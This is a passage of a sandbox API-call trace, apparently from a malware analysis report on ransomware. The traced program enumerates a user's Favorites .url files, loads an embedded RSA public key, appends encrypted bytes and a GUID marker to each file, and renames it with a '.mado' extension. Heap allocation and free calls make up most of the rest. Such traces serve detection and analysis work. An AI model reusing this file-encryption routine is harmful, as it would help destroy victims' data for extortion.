(HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.460] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.mado")) returned 1 [0205.461] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0205.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.461] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0205.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.462] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.462] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.465] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.465] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.465] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.466] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.466] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.466] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.466] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.467] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.467] GetLastError () returned 0x0 [0205.467] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.467] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.467] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.467] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.467] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.467] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.467] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.467] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.467] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.467] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.467] CloseHandle (hObject=0x63c) returned 1 [0205.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.468] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.mado")) returned 1 [0205.470] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0205.470] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67168 | out: hHeap=0x2c0000) returned 1 [0205.470] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.470] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 